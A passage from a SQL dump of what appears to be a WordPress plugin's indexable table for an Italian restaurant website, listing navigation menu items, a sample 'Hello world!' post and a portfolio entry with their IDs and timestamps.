19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1016,NULL,NULL,3201,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1017,NULL,NULL,3202,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1018,NULL,NULL,3203,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1019,NULL,NULL,3204,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1020,NULL,NULL,3205,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1021,NULL,NULL,3206,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1022,NULL,NULL,3207,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1023,NULL,NULL,3208,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1024,NULL,NULL,3209,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1025,NULL,NULL,3210,'post','nav_menu_item',1,3061,NULL,NULL,'Three Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1026,NULL,NULL,3211,'post','nav_menu_item',1,0,NULL,NULL,'Big Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1027,NULL,NULL,3212,'post','nav_menu_item',1,0,NULL,NULL,'Small Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1028,NULL,NULL,3213,'post','nav_menu_item',1,0,NULL,NULL,'Big Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1029,NULL,NULL,3214,'post','nav_menu_item',1,0,NULL,NULL,'Big Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1030,NULL,NULL,3215,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1031,NULL,NULL,3216,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1032,NULL,NULL,3217,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1033,NULL,NULL,3218,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1034,NULL,NULL,3219,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1035,NULL,NULL,3220,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1036,NULL,NULL,3221,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1037,NULL,NULL,3222,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1038,NULL,NULL,3223,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1039,NULL,NULL,3224,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1040,NULL,NULL,3225,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1041,NULL,NULL,3226,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1042,NULL,NULL,3227,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1043,NULL,NULL,3228,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1044,NULL,NULL,3229,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1045,NULL,NULL,3230,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1046,NULL,NULL,3231,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1047,NULL,NULL,3232,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1048,NULL,NULL,3233,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1049,NULL,NULL,3234,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1050,NULL,NULL,3235,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1051,NULL,NULL,3236,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1052,NULL,NULL,3237,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1053,NULL,NULL,3238,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1054,NULL,NULL,3239,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1055,NULL,NULL,3240,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1056,NULL,NULL,3241,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1057,NULL,NULL,3242,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1058,NULL,NULL,3243,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1596,'https://www.ristorantesolymar.it/vecchio/2018/07/25/hello-world/','64:d1b372dbfce0cc88fd6766b73e1cdd78',1,'post','post',1,0,NULL,NULL,'Hello world!','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:34','2021-02-19 17:48:25',1,NULL,NULL,NULL,NULL,0,NULL),(1562,NULL,NULL,3739,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1563,NULL,NULL,3740,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1564,NULL,NULL,3741,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1565,NULL,NULL,3742,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1566,NULL,NULL,3743,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1065,NULL,NULL,3250,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1066,NULL,NULL,3251,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1067,NULL,NULL,3252,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1068,NULL,NULL,3253,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1069,NULL,NULL,3254,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1070,NULL,NULL,3255,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1071,NULL,NULL,3256,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1072,NULL,NULL,3257,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1073,NULL,NULL,3258,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1074,NULL,NULL,3259,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1075,NULL,NULL,3260,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1076,NULL,NULL,3261,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1077,NULL,NULL,3262,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1078,NULL,NULL,3263,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1079,NULL,NULL,3264,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1080,NULL,NULL,3265,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1081,NULL,NULL,3266,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1082,NULL,NULL,3267,'post','nav_menu_item',1,0,NULL,NULL,'Standard List','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1595,'https://www.ristorantesolymar.it/vecchio/portfolio-item/mk-fruit-2/','67:f54533e6587af704e5607980d9f3adf7',2930,'post','portfolio-item',1,0,NULL,NULL,'M&#038;K Fruit','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:34','2021-01-31 22:21:42',1,NULL,NULL,NULL,NULL,0,NULL),(1560,NULL,NULL,3737,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1561,NULL,NULL,3738,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1559,NULL,NULL,3736,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1087,NULL,NULL,3272,'post','nav_menu_item',1,0,NULL,NULL,'Standard List','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1088,NULL,NULL,3273,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1089,NULL,NULL,3274,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1090,NULL,NULL,3275,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1091,NULL,NULL,3276,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1092,NULL,NULL,3277,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1093,NULL,NULL,3278,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 